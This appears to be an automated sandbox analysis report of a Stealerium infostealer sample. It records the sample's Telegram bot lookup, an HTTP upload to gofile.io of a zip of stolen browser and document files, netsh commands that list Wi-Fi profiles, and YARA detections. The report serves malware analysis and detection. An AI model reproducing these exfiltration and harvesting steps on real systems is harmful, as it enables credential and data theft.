                                                                                                                                                            Data Ascii: {"ok":true,"result":{"id":7785245272,"is_bot":true,"first_name":"stealirum","username":"stealirum_bot","can_join_groups":true,"can_read_all_group_messages":false,"supports_inline_queries":false,"can_connect_to_business":false,"has_main_web_app":false}}


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            7192.168.2.44973945.112.123.1264436400C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-29 11:28:36 UTC70OUTGET /servers HTTP/1.1
                                                                                                                                                            Host: api.gofile.io
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2024-11-29 11:28:36 UTC1116INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.27.1
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:36 GMT
                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                            Content-Length: 387
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                            Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            Origin-Agent-Cluster: ?1
                                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-DNS-Prefetch-Control: off
                                                                                                                                                            X-Download-Options: noopen
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            ETag: W/"183-Eu4ZgiiMPo3kPouaVtriWa7zHuE"
                                                                                                                                                            2024-11-29 11:28:36 UTC387INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 61 74 61 22 3a 7b 22 73 65 72 76 65 72 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 35 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 31 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 31 30 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 32 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 5d 2c 22 73 65 72 76 65 72 73 41 6c 6c 5a 6f 6e 65 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 33 22 2c 22 7a 6f 6e 65 22 3a 22 6e 61 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 39 22 2c 22 7a 6f 6e 65 22 3a 22 6e 61 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 38 22 2c 22 7a 6f 6e
                                                                                                                                                            Data Ascii: {"status":"ok","data":{"servers":[{"name":"store5","zone":"eu"},{"name":"store1","zone":"eu"},{"name":"store10","zone":"eu"},{"name":"store2","zone":"eu"}],"serversAllZone":[{"name":"store3","zone":"na"},{"name":"store9","zone":"na"},{"name":"store8","zon


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            8192.168.2.44974031.14.70.2444436400C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-29 11:28:38 UTC207OUTPOST /uploadfile HTTP/1.1
                                                                                                                                                            Content-Type: multipart/form-data; boundary="807f9f0a-5cc3-4dc0-ad4d-1aa9765d148e"
                                                                                                                                                            Host: store5.gofile.io
                                                                                                                                                            Content-Length: 118763
                                                                                                                                                            Expect: 100-continue
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2024-11-29 11:28:38 UTC40OUTData Raw: 2d 2d 38 30 37 66 39 66 30 61 2d 35 63 63 33 2d 34 64 63 30 2d 61 64 34 64 2d 31 61 61 39 37 36 35 64 31 34 38 65 0d 0a
                                                                                                                                                            Data Ascii: --807f9f0a-5cc3-4dc0-ad4d-1aa9765d148e
                                                                                                                                                            2024-11-29 11:28:38 UTC123OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6a 6f 6e 65 73 40 39 31 30 36 34 36 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 6a 6f 6e 65 73 25 34 30 39 31 30 36 34 36 5f 65 6e 2d 43 48 2e 7a 69 70 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: Content-Disposition: form-data; name=file; filename="user@910646_en-CH.zip"; filename*=utf-8''user%40910646_en-CH.zip
                                                                                                                                                            2024-11-29 11:28:38 UTC4096OUTData Raw: 50 4b 03 04 14 00 01 08 00 00 8f 33 7d 59 00 00 00 00 0c 00 00 00 00 00 00 00 19 00 00 00 42 72 6f 77 73 65 72 73 2f 45 64 67 65 2f 48 69 73 74 6f 72 79 2e 74 78 74 54 43 61 68 2d 41 1e 9c 7a 3a db 96 50 4b 03 04 14 00 09 08 08 00 8f 33 7d 59 71 80 43 5d 74 00 00 00 dc 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 2f 46 69 72 65 66 6f 78 2f 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 d3 df 38 7d 33 90 5a a3 b6 1b ef 8c ce f6 b8 ce a6 0a 5c b3 67 d3 28 f0 92 3b 31 a3 62 8f f5 10 dd cd 4f e0 f4 ba 87 89 2d 97 ca b1 25 4f f6 40 55 f8 3f ad 8a c4 39 86 b8 2d 36 86 76 9b e8 fa ee 80 54 aa ac 77 41 ed c1 c0 3c 05 36 31 b3 16 64 3d 9a f0 50 ff a3 59 95 73 5f 10 1a 50 30 1e fa 1e fd 23 6f a0 bd ee a2 7e 7a 8c f5 c0 f2 98 d4 9e 82 3f 50 4b 07 08 71 80 43 5d 74 00 00 00
                                                                                                                                                            Data Ascii: PK3}YBrowsers/Edge/History.txtTCah-Az:PK3}YqC]tBrowsers/Firefox/Bookmarks.txt8}3Z\g(;1bO-%O@U?9-6vTwA<61d=PYs_P0#o~z?PKqC]t
                                                                                                                                                            2024-11-29 11:28:38 UTC4096OUTData Raw: aa d9 42 74 17 f0 2f d0 3a f7 f1 38 13 72 7a b7 82 61 ec 47 50 2d 0b 05 4f 1b d9 6d dc 23 70 94 3d ad 0f 8c 44 ce ca 6f 9f e1 b7 d2 cb ef ed ee 8d 20 56 c4 7b e5 8f d8 32 07 32 30 09 3d 6d 42 23 cf d4 05 3d 9e 11 89 30 d0 ef 6a f0 df d6 63 f8 b0 2a 83 93 a0 5f 7e de 07 0e e4 5a 0b 48 02 e1 fd 3e 13 8b a8 5f 48 cd 8d f4 60 0d 43 e2 9d e3 29 cf f8 42 71 6d a1 e1 61 ff a6 5a 89 c9 43 1c ea 92 d2 00 ad 72 44 65 4d a0 c2 38 97 d3 5c 55 fd e6 6f 40 05 cc f3 d9 6c 97 7e 84 52 2a 26 95 1e 62 0b 8c 5a 06 90 8a de df 51 d5 6d 5e c4 c6 70 04 4b f5 36 47 bd 9e 58 32 76 f8 7b 54 cd 23 e6 0f 1c 4b 02 11 50 cb 0e 07 94 3f 1e 4f f0 8d 8d c1 1a 09 eb 96 d6 31 83 3a d5 97 11 4f 34 35 7d c2 4a b0 bc 12 0c cb 1e 7e 7c 00 c3 1f f1 3e 38 2c 30 ad ed 7f 3d 58 3e 4d d0 5f fe dd
                                                                                                                                                            Data Ascii: Bt/:8rzaGP-Om#p=Do V{220=mB#=0jc*_~ZH>_H`C)BqmaZCrDeM8\Uo@l~R*&bZQm^pK6GX2v{T#KP?O1:O45}J~|>8,0=X>M_
                                                                                                                                                            2024-11-29 11:28:38 UTC4096OUTData Raw: 01 63 5a 9e c8 34 57 df 44 64 6d 0f ef 3d a7 07 f4 0f 0c 2c 85 c2 a1 14 d4 f2 76 13 00 b9 ea 32 1f 33 8e e4 a5 7d 42 99 ee 76 b7 1f 66 b1 6b 94 5f 67 15 32 5b ee b4 86 50 b2 94 6d 5e dc 5c ef 27 e6 6d 65 63 08 35 6b da 2a e3 ca dd fa fc 4b 0d 35 b0 7f 8a 89 9a a0 bf e8 c5 97 cc 08 da 45 b2 3a d1 96 3b 72 da 01 53 73 fc aa 05 4e 16 5b ee bf 4e ae f5 cf d3 b1 3c ac 50 4b 07 08 2f 31 d7 cb 91 02 00 00 02 04 00 00 50 4b 03 04 14 00 09 08 08 00 52 40 44 57 59 f1 45 0f 94 02 00 00 02 04 00 00 33 00 00 00 47 72 61 62 62 65 72 2f 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 65 73 6b 74 6f 70 2f 55 4d 4d 42 44 4e 45 51 42 4e 2e 64 6f 63 78 5d 2b 89 7c 2c 0d 5e 98 85 65 8f 40 ed 73 76 89 bb 4f 22 a7 b4 22 30 fa 04 6d 72 8b 00 3b ce 2c 1f 9f 3b 2b
                                                                                                                                                            Data Ascii: cZ4WDdm=,v23}Bvfk_g2[Pm^\'mec5k*K5E:;rSsN[N<PK/1PKR@DWYE3Grabber/DRIVE-C/Users/user/Desktop/UMMBDNEQBN.docx]+|,^e@svO""0mr;,;+
                                                                                                                                                            2024-11-29 11:28:38 UTC4096OUTData Raw: 0c 58 9c 93 80 d0 cc 6f 90 02 95 a5 1c 59 63 64 2c 9b 1f 13 cb d7 84 80 aa 43 ca 1b 76 7c 8b ae e4 06 86 9e 0e cc 01 77 9d 44 6b b6 da 27 94 2f 51 0f c3 4e 74 97 04 51 6f 47 6c d3 d4 70 d9 c7 44 5a 31 38 b5 c7 e0 63 df 6d b2 d8 75 44 ef 24 c9 58 6c 9c 5b e9 ec 29 39 e3 3e e9 0a cb f8 88 e3 86 4a 3e e7 09 e2 8f 61 1a f3 af 20 14 9e 0c f4 5f be fd 37 a3 1d 4b 43 e7 b2 fa b7 81 c3 4d 26 28 e2 38 f0 0d b6 5f 7b ed d5 ef f6 d1 3d 56 1e fc b2 78 17 96 2c 8a 35 26 45 c4 90 e4 ae c1 59 7e 3a e7 46 82 05 ef 45 6d 7c e3 a2 c3 67 4f 05 d1 b9 63 4b b9 d1 78 18 91 89 00 5c 7b d2 a9 91 0a 2d 8c f7 e9 22 81 5a ae e6 d9 a3 b5 02 c4 09 dd 81 de 96 4a 63 26 38 f5 21 3a bd 7f a5 8e 85 f9 92 e2 e9 bd 10 7a 7e 07 0a ca 56 42 31 10 70 39 3f ec fb 30 fe 74 ee df 0d 74 4c d1 d6
                                                                                                                                                            Data Ascii: XoYcd,Cv|wDk'/QNtQoGlpDZ18cmuD$Xl[)9>J>a _7KCM&(8_{=Vx,5&EY~:FEm|gOcKx\{-"ZJc&8!:z~VB1p9?0ttL
                                                                                                                                                            2024-11-29 11:28:38 UTC4096OUTData Raw: 90 d9 ba fd 62 f4 a3 33 4e b8 61 0e e5 e1 40 f8 ba e5 79 4a 6e 94 d2 d8 61 5d 79 1e 03 f9 b4 94 64 aa 2b 0f a8 e0 bb cc b7 c6 28 9a e7 68 16 ed ac 67 16 69 58 51 90 99 36 6a ed cb 16 44 a4 64 18 a9 1b 70 f2 bd b5 f5 69 c4 59 b0 35 5c 16 ab 2e c0 b5 fb 67 40 17 cf 7c 0b 11 00 85 86 67 d7 29 2c ba ee 8e b9 19 ab 82 c7 a6 d0 b3 08 36 77 8b 1e 63 5e 2c 71 4e 8a 06 0e 44 e0 0f 6f 06 e2 27 0c f2 e0 bc 05 50 9b e7 84 1b 95 72 c2 36 aa 4b c5 e5 bf c8 7e fe 01 65 fb eb 35 60 98 5e a0 80 71 80 1d 6c 73 2a 94 62 0d 8a e0 17 87 f5 00 ab 7e 58 33 1d 55 23 c2 df 96 92 4c 9a 18 9d 82 e6 fc f2 db 90 09 2c db e3 b5 58 5c 34 26 78 ac ab 5d 0e f4 15 0f 4a 2e 76 21 82 68 35 e2 33 0f 9b 39 a0 b4 14 a2 57 43 2e 5f 24 d7 36 e6 5d 25 0d 16 dc ec dc 9c 1f 21 00 7a 3c 4d 12 df 79
                                                                                                                                                            Data Ascii: b3Na@yJna]yd+(hgiXQ6jDdpiY5\.g@|g),6wc^,qNDo'Pr6K~e5`^qls*b~X3U#L,X\4&x]J.v!h539WC._$6]%!z<My
                                                                                                                                                            2024-11-29 11:28:38 UTC4096OUTData Raw: 56 f0 ab 92 b5 a2 06 f0 15 97 02 b4 22 8f 59 b7 71 e5 e5 2b fd 17 55 fb 6e 7a 93 74 19 ec da a3 f6 49 5d e4 50 4b 07 08 50 ad d3 d6 92 02 00 00 02 04 00 00 50 4b 03 04 14 00 09 08 08 00 52 40 44 57 50 ad d3 d6 92 02 00 00 02 04 00 00 35 00 00 00 47 72 61 62 62 65 72 2f 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 48 54 41 47 56 44 46 55 49 45 2e 78 6c 73 78 f3 9c a8 2e 2b 95 6d 6f 2e 50 aa a4 87 41 6b c8 7b fc 52 a7 00 ee 11 68 83 18 d6 12 98 0d b6 f9 bc 8c 7b ee 9e 81 ea a3 de 18 f0 18 31 af e9 8c a4 ef 4f 66 43 79 c3 56 01 d4 94 8c ef 63 aa 7d 4e 05 fb e1 7e 64 de 4b c2 9e 47 92 1f f1 7c c1 18 74 77 17 8b bd 13 a6 6b d0 18 0f fa 04 fc 1a 2b 62 3e 05 28 8b 5e 0c 08 b3 82 83 a4 ad d1 99 1a b4 92 05 a7 ee 6e 38
                                                                                                                                                            Data Ascii: V"Yq+UnztI]PKPPKR@DWP5Grabber/DRIVE-C/Users/user/Documents/HTAGVDFUIE.xlsx.+mo.PAk{Rh{1OfCyVc}N~dKG|twk+b>(^n8
                                                                                                                                                            2024-11-29 11:28:38 UTC4096OUTData Raw: e2 d4 27 6b 2c e9 44 64 3c 5f a3 b5 8a 61 a1 fa 6f e8 19 fc fc ef bb 60 e1 2c 6a 67 4e 9b b0 89 77 0d a3 2a cc 01 2a d8 05 9a 92 77 df 6a 04 f4 a7 05 52 39 7d 36 ef 12 01 03 38 5f 2a 7e 6d 09 aa 5b 65 ec 59 d7 3f 0e 1c c8 56 36 e5 7a 53 27 bc 43 98 47 25 c3 e7 ab cd 65 a9 a8 88 e2 90 1f 9b cb c0 a5 7e de 0c 63 fd e4 fd 2e a2 0f 87 90 12 78 56 7e 86 f4 cb b0 b9 f0 76 2d 0f 17 4c 45 65 c2 2b a2 22 a4 f1 17 90 33 75 47 15 8b 15 a0 c9 54 bb 1f 7c 80 6f 2f 61 c3 e2 81 58 d2 79 bd ef 5a 5f 9f 61 cd be ee d9 a4 9b a7 f1 b8 86 05 49 a2 bd 7d 6e a1 bf 7e 0a b8 31 05 e9 c4 f8 4f 96 46 51 cf 3f 45 0d 1a bd 9f c4 99 2e d4 b3 e5 70 f4 c4 5c 3b 23 1d 94 99 c1 87 a1 6c f5 bc b1 9c d0 84 2f c5 32 ad 48 81 5f ec 72 2e b0 c6 59 e7 b9 bd e8 06 3b c3 7c af 5f d8 4a 02 3a fa
                                                                                                                                                            Data Ascii: 'k,Dd<_ao`,jgNw**wjR9}68_*~m[eY?V6zS'CG%e~c.xV~v-LEe+"3uGT|o/aXyZ_aI}n~1OFQ?E.p\;#l/2H_r.Y;|_J:
                                                                                                                                                            2024-11-29 11:28:38 UTC4096OUTData Raw: 27 90 0c 7b b4 1d 9a e6 43 c7 83 63 bf 70 53 67 3a de 3f 97 2e 6f 7c 3c e7 27 84 3f 3b e5 cb 53 36 37 01 06 b6 fb 13 43 a6 73 9a c9 03 7b 65 55 3c b9 57 e8 fb 0f f1 11 d6 8f 0e bf f5 04 4b 9a 29 1e 97 92 67 86 66 3a 69 e9 c7 a9 99 81 45 f0 76 70 3a 9b 9d 51 ca 98 e6 63 36 1b b9 15 bd 2b 8a 19 c8 a9 fb fe 3b b2 ca 60 ae af c5 d6 f8 f6 0f a4 01 33 9b a1 3c 05 13 45 c9 29 1d a9 ee bf a5 c0 52 3a 35 42 fc 97 63 a5 60 ac c1 e3 32 50 6a 56 05 c4 04 84 9b aa f8 17 42 ba 41 55 7d 77 c2 d5 74 c3 86 ba dd b5 b2 a5 09 c1 f1 d1 bf c8 b2 db bf 5b 20 56 82 ba 77 ff 76 d6 d7 43 02 01 64 a5 25 da aa d3 f3 e6 44 50 cc 05 de a6 50 4b 07 08 2f 31 d7 cb 91 02 00 00 02 04 00 00 50 4b 03 04 14 00 09 08 08 00 52 40 44 57 59 f1 45 0f 94 02 00 00 02 04 00 00 40 00 00 00 47 72 61
                                                                                                                                                            Data Ascii: '{CcpSg:?.o|<'?;S67Cs{eU<WK)gf:iEvp:Qc6+;`3<E)R:5Bc`2PjVBAU}wt[ VwvCd%DPPK/1PKR@DWYE@Gra
                                                                                                                                                            2024-11-29 11:28:39 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                            2024-11-29 11:28:40 UTC536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                            Server: nginx/1.27.2
                                                                                                                                                            Date: Fri, 29 Nov 2024 11:28:40 GMT
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            Content-Length: 27
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                            Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            error-createFolderResponse


                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:06:28:24
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\K6aOw2Jmji.exe"
                                                                                                                                                            Imagebase:0x267e6f40000
                                                                                                                                                            File size:3'747'840 bytes
                                                                                                                                                            MD5 hash:98A0C65BC0FE05D40971716FFD216519
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2156264198.00000267806FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2156264198.00000267805C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:06:28:30
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                            Imagebase:0x7ff7aa1b0000
                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:06:28:30
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:06:28:30
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                            Imagebase:0x7ff7af750000
                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:06:28:30
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                            Imagebase:0x7ff689760000
                                                                                                                                                            File size:69'632 bytes
                                                                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:06:28:30
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:netsh wlan show profile
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:06:28:30
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\findstr.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:findstr All
                                                                                                                                                            Imagebase:0x7ff74dd00000
                                                                                                                                                            File size:36'352 bytes
                                                                                                                                                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:06:28:31
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                                                                                                            Imagebase:0x7ff7aa1b0000
                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:06:28:31
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:06:28:31
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                            Imagebase:0x7ff7af750000
                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:10
                                                                                                                                                            Start time:06:28:31
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:netsh wlan show networks mode=bssid
                                                                                                                                                            Imagebase:0x7ff6e9fc0000
                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:13
                                                                                                                                                            Start time:06:28:39
                                                                                                                                                            Start date:29/11/2024
                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 6400 -s 3132
                                                                                                                                                            Imagebase:0x7ff6e48b0000
                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Reset < >
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
